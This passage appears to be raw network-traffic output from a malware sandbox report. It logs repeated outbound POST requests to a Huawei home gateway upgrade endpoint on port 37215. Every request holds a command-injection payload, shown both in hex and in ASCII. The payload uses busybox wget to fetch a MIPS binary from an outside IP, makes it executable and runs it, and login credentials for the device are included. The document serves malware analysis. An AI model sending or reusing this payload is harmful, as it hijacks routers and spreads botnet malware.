                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:47.207225084 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:55.142874002 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:10.758230925 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:42.244946957 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              147192.168.2.1459846156.254.76.24737215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:39.627753973 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:41.287461042 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:43.239381075 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:47.207231045 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:55.142868042 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
